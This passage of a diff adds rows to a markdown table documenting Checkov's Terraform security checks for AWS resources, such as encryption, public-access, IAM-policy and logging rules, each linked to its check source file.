+| 49 | CKV_AWS_6 | resource | aws_elasticsearch_domain | Ensure all Elasticsearch has node-to-node encryption enabled | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) |
+| 50 | CKV_AWS_6 | resource | aws_opensearch_domain | Ensure all Elasticsearch has node-to-node encryption enabled | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) |
+| 51 | CKV_AWS_7 | resource | aws_kms_key | Ensure rotation for customer created CMKs is enabled | Terraform | [KMSRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSRotation.py) |
+| 52 | CKV_AWS_8 | resource | aws_instance | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted | Terraform | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py) |
+| 53 | CKV_AWS_8 | resource | aws_launch_configuration | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted | Terraform | 
[LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py) |
+| 54 | CKV_AWS_9 | resource | aws_iam_account_password_policy | Ensure IAM password policy expires passwords within 90 days or less | Terraform | [PasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyExpiration.py) |
+| 55 | CKV_AWS_10 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires minimum length of 14 or greater | Terraform | [PasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLength.py) |
+| 56 | CKV_AWS_11 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one lowercase letter | Terraform | [PasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLowercaseLetter.py) |
+| 57 | CKV_AWS_12 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one number | Terraform | [PasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyNumber.py) |
+| 58 | CKV_AWS_13 | resource | aws_iam_account_password_policy | Ensure IAM password policy prevents password reuse | Terraform | [PasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyReuse.py) |
+| 59 | CKV_AWS_14 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one symbol | Terraform | [PasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicySymbol.py) |
+| 60 | CKV_AWS_15 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one 
uppercase letter | Terraform | [PasswordPolicyUppercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyUppercaseLetter.py) |
+| 61 | CKV_AWS_16 | resource | aws_db_instance | Ensure all data stored in the RDS is securely encrypted at rest | Terraform | [RDSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEncryption.py) |
+| 62 | CKV_AWS_17 | resource | aws_db_instance | Ensure all data stored in RDS is not publicly accessible | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py) |
+| 63 | CKV_AWS_17 | resource | aws_rds_cluster_instance | Ensure all data stored in RDS is not publicly accessible | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py) |
+| 64 | CKV_AWS_18 | resource | aws_s3_bucket | Ensure the S3 bucket has access logging enabled | Terraform | [S3BucketLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLogging.yaml) |
+| 65 | CKV_AWS_19 | resource | aws_s3_bucket | Ensure all data stored in the S3 bucket is securely encrypted at rest | Terraform | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml) |
+| 66 | CKV_AWS_19 | resource | aws_s3_bucket_server_side_encryption_configuration | Ensure all data stored in the S3 bucket is securely encrypted at rest | Terraform | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml) |
+| 67 | CKV_AWS_20 | resource | aws_s3_bucket | S3 Bucket has an ACL defined which allows public READ access. 
| Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml) |
+| 68 | CKV_AWS_20 | resource | aws_s3_bucket_acl | S3 Bucket has an ACL defined which allows public READ access. | Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml) |
+| 69 | CKV_AWS_21 | resource | aws_s3_bucket | Ensure all data stored in the S3 bucket have versioning enabled | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml) |
+| 70 | CKV_AWS_21 | resource | aws_s3_bucket_versioning | Ensure all data stored in the S3 bucket have versioning enabled | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml) |
+| 71 | CKV_AWS_22 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker Notebook is encrypted at rest using KMS CMK | Terraform | [SagemakerNotebookEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookEncryption.py) |
+| 72 | CKV_AWS_23 | resource | aws_db_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 73 | CKV_AWS_23 | resource | aws_elasticache_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 74 | CKV_AWS_23 | resource | aws_redshift_security_group | Ensure every security group and rule has a description | Terraform | 
[SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 75 | CKV_AWS_23 | resource | aws_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 76 | CKV_AWS_23 | resource | aws_security_group_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 77 | CKV_AWS_23 | resource | aws_vpc_security_group_egress_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 78 | CKV_AWS_23 | resource | aws_vpc_security_group_ingress_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 79 | CKV_AWS_24 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) |
+| 80 | CKV_AWS_24 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) |
+| 81 | CKV_AWS_24 | resource | aws_vpc_security_group_ingress_rule | Ensure no 
security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) |
+| 82 | CKV_AWS_25 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) |
+| 83 | CKV_AWS_25 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) |
+| 84 | CKV_AWS_25 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) |
+| 85 | CKV_AWS_26 | resource | aws_sns_topic | Ensure all data stored in the SNS topic is encrypted | Terraform | [SNSTopicEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicEncryption.py) |
+| 86 | CKV_AWS_27 | resource | aws_sqs_queue | Ensure all data stored in the SQS queue is encrypted | Terraform | [SQSQueueEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueueEncryption.py) |
+| 87 | CKV_AWS_28 | resource | aws_dynamodb_table | Ensure DynamoDB point in time recovery (backup) is enabled | Terraform | [DynamodbRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamodbRecovery.py) |
+| 88 | CKV_AWS_29 | resource | 
aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at rest | Terraform | [ElasticacheReplicationGroupEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py) |
+| 89 | CKV_AWS_30 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit | Terraform | [ElasticacheReplicationGroupEncryptionAtTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransit.py) |
+| 90 | CKV_AWS_31 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit and has auth token | Terraform | [ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py) |
+| 91 | CKV_AWS_32 | resource | aws_ecr_repository_policy | Ensure ECR policy is not set to public | Terraform | [ECRPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRPolicy.py) |
+| 92 | CKV_AWS_33 | resource | aws_kms_key | Ensure KMS key policy does not contain wildcard (*) principal | Terraform | [KMSKeyWildcardPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyWildcardPrincipal.py) |
+| 93 | CKV_AWS_34 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution ViewerProtocolPolicy is set to HTTPS | Terraform | [CloudfrontDistributionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEncryption.py) |
+| 94 | CKV_AWS_35 | resource | aws_cloudtrail | Ensure CloudTrail logs are encrypted at 
rest using KMS CMKs | Terraform | [CloudtrailEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEncryptionWithCMK.py) |
+| 95 | CKV_AWS_36 | resource | aws_cloudtrail | Ensure CloudTrail log file validation is enabled | Terraform | [CloudtrailLogValidation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailLogValidation.py) |
+| 96 | CKV_AWS_37 | resource | aws_eks_cluster | Ensure Amazon EKS control plane logging is enabled for all log types | Terraform | [EKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSControlPlaneLogging.py) |
+| 97 | CKV_AWS_38 | resource | aws_eks_cluster | Ensure Amazon EKS public endpoint not accessible to 0.0.0.0/0 | Terraform | [EKSPublicAccessCIDR.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccessCIDR.py) |
+| 98 | CKV_AWS_39 | resource | aws_eks_cluster | Ensure Amazon EKS public endpoint disabled | Terraform | [EKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccess.py) |
+| 99 | CKV_AWS_40 | resource | aws_iam_policy_attachment | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) |
+| 100 | CKV_AWS_40 | resource | aws_iam_user_policy | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) 
| Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) |
+| 101 | CKV_AWS_40 | resource | aws_iam_user_policy_attachment | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) |
+| 102 | CKV_AWS_41 | provider | aws | Ensure no hard coded AWS access key and secret key exists in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/aws/credentials.py) |
+| 103 | CKV_AWS_42 | resource | aws_efs_file_system | Ensure EFS is securely encrypted | Terraform | [EFSEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSEncryptionEnabled.py) |
+| 104 | CKV_AWS_43 | resource | aws_kinesis_stream | Ensure Kinesis Stream is securely encrypted | Terraform | [KinesisStreamEncryptionType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptionType.py) |
+| 105 | CKV_AWS_44 | resource | aws_neptune_cluster | Ensure Neptune storage is securely encrypted | Terraform | [NeptuneClusterStorageEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterStorageEncrypted.py) |
+| 106 | CKV_AWS_45 | resource | aws_lambda_function | Ensure no hard-coded secrets exist in lambda environment | Terraform | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentCredentials.py) |
+| 107 | CKV_AWS_46 | resource | aws_instance | Ensure no 
hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) |
+| 108 | CKV_AWS_46 | resource | aws_launch_configuration | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) |
+| 109 | CKV_AWS_46 | resource | aws_launch_template | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) |
+| 110 | CKV_AWS_47 | resource | aws_dax_cluster | Ensure DAX is encrypted at rest (default is unencrypted) | Terraform | [DAXEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEncryption.py) |
+| 111 | CKV_AWS_48 | resource | aws_mq_broker | Ensure MQ Broker logging is enabled | Terraform | [MQBrokerLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerLogging.py) |
+| 112 | CKV_AWS_49 | data | aws_iam_policy_document | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [StarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/StarActionPolicyDocument.py) |
+| 113 | CKV_AWS_50 | resource | aws_lambda_function | X-Ray tracing is enabled for Lambda | Terraform | [LambdaXrayEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaXrayEnabled.py) |
+| 114 | CKV_AWS_51 | resource | aws_ecr_repository | Ensure ECR Image Tags are immutable | Terraform | [ECRImmutableTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImmutableTags.py) |
+| 115 | CKV_AWS_53 | resource | aws_s3_bucket_public_access_block | 
Ensure S3 bucket has block public ACLS enabled | Terraform | [S3BlockPublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicACLs.py) |
+| 116 | CKV_AWS_54 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has block public policy enabled | Terraform | [S3BlockPublicPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicPolicy.py) |
+| 117 | CKV_AWS_55 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has ignore public ACLs enabled | Terraform | [S3IgnorePublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3IgnorePublicACLs.py) |
+| 118 | CKV_AWS_56 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has 'restrict_public_buckets' enabled | Terraform | [S3RestrictPublicBuckets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3RestrictPublicBuckets.py) |
+| 119 | CKV_AWS_57 | resource | aws_s3_bucket | S3 Bucket has an ACL defined which allows public WRITE access. | Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml) |
+| 120 | CKV_AWS_57 | resource | aws_s3_bucket_acl | S3 Bucket has an ACL defined which allows public WRITE access. 
| Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml) |
+| 121 | CKV_AWS_58 | resource | aws_eks_cluster | Ensure EKS Cluster has Secrets Encryption Enabled | Terraform | [EKSSecretsEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSSecretsEncryption.py) |
+| 122 | CKV_AWS_59 | resource | aws_api_gateway_method | Ensure there is no open access to back-end resources through API | Terraform | [APIGatewayAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAuthorization.py) |
+| 123 | CKV_AWS_60 | resource | aws_iam_role | Ensure IAM role allows only specific services or principals to assume it | Terraform | [IAMRoleAllowsPublicAssume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowsPublicAssume.py) |
+| 124 | CKV_AWS_61 | resource | aws_iam_role | Ensure AWS IAM policy does not allow assume role permission across all services | Terraform | [IAMRoleAllowAssumeFromAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowAssumeFromAccount.py) |
+| 125 | CKV_AWS_62 | resource | aws_iam_group_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) |
+| 126 | CKV_AWS_62 | resource | aws_iam_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) |
+| 127 | CKV_AWS_62 | resource | aws_iam_role_policy | Ensure IAM policies that allow full "*-*" administrative privileges 
are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) |
+| 128 | CKV_AWS_62 | resource | aws_iam_user_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) |
+| 129 | CKV_AWS_62 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) |
+| 130 | CKV_AWS_63 | resource | aws_iam_group_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) |
+| 131 | CKV_AWS_63 | resource | aws_iam_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) |
+| 132 | CKV_AWS_63 | resource | aws_iam_role_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) |
+| 133 | CKV_AWS_63 | resource | aws_iam_user_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) |
+| 134 | CKV_AWS_63 | resource | 
aws_ssoadmin_permission_set_inline_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) |
+| 135 | CKV_AWS_64 | resource | aws_redshift_cluster | Ensure all data stored in the Redshift cluster is securely encrypted at rest | Terraform | [RedshiftClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterEncryption.py) |
+| 136 | CKV_AWS_65 | resource | aws_ecs_cluster | Ensure container insights are enabled on ECS cluster | Terraform | [ECSClusterContainerInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterContainerInsights.py) |
+| 137 | CKV_AWS_66 | resource | aws_cloudwatch_log_group | Ensure that CloudWatch Log Group specifies retention days | Terraform | [CloudWatchLogGroupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetention.py) |
+| 138 | CKV_AWS_67 | resource | aws_cloudtrail | Ensure CloudTrail is enabled in all Regions | Terraform | [CloudtrailMultiRegion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailMultiRegion.py) |
+| 139 | CKV_AWS_68 | resource | aws_cloudfront_distribution | CloudFront Distribution should have WAF enabled | Terraform | [WAFEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFEnabled.py) |
+| 140 | CKV_AWS_69 | resource | aws_mq_broker | Ensure MQ Broker is not publicly exposed | Terraform | [MQBrokerNotPubliclyExposed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerNotPubliclyExposed.py) |
+| 141 | CKV_AWS_70 | resource | aws_s3_bucket | Ensure S3 bucket does not allow an action with any 
Principal | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py) |
+| 142 | CKV_AWS_70 | resource | aws_s3_bucket_policy | Ensure S3 bucket does not allow an action with any Principal | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py) |
+| 143 | CKV_AWS_71 | resource | aws_redshift_cluster | Ensure Redshift Cluster logging is enabled | Terraform | [RedshiftClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterLogging.py) |
+| 144 | CKV_AWS_72 | resource | aws_sqs_queue_policy | Ensure SQS policy does not allow ALL (*) actions. | Terraform | [SQSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSPolicy.py) |
+| 145 | CKV_AWS_73 | resource | aws_api_gateway_stage | Ensure API Gateway has X-Ray Tracing enabled | Terraform | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayXray.py) |
+| 146 | CKV_AWS_74 | resource | aws_docdb_cluster | Ensure DocumentDB is encrypted at rest (default is unencrypted) | Terraform | [DocDBEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryption.py) |
+| 147 | CKV_AWS_75 | resource | aws_globalaccelerator_accelerator | Ensure Global Accelerator accelerator has flow logs enabled | Terraform | [GlobalAcceleratorAcceleratorFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlobalAcceleratorAcceleratorFlowLogs.py) |
+| 148 | CKV_AWS_76 | resource | aws_api_gateway_stage | Ensure API Gateway has Access Logging enabled | Terraform | 
[APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py) |
+| 149 | CKV_AWS_76 | resource | aws_apigatewayv2_stage | Ensure API Gateway has Access Logging enabled | Terraform | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py) |
+| 150 | CKV_AWS_77 | resource | aws_athena_database | Ensure Athena Database is encrypted at rest (default is unencrypted) | Terraform | [AthenaDatabaseEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaDatabaseEncryption.py) |
+| 151 | CKV_AWS_78 | resource | aws_codebuild_project | Ensure that CodeBuild Project encryption is not disabled | Terraform | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildProjectEncryption.py) |
+| 152 | CKV_AWS_79 | resource | aws_instance | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) |
+| 153 | CKV_AWS_79 | resource | aws_launch_configuration | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) |
+| 154 | CKV_AWS_79 | resource | aws_launch_template | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) |
+| 155 | CKV_AWS_80 | resource | aws_msk_cluster | Ensure MSK Cluster logging is enabled | Terraform | [MSKClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterLogging.py) |
+| 156 | 
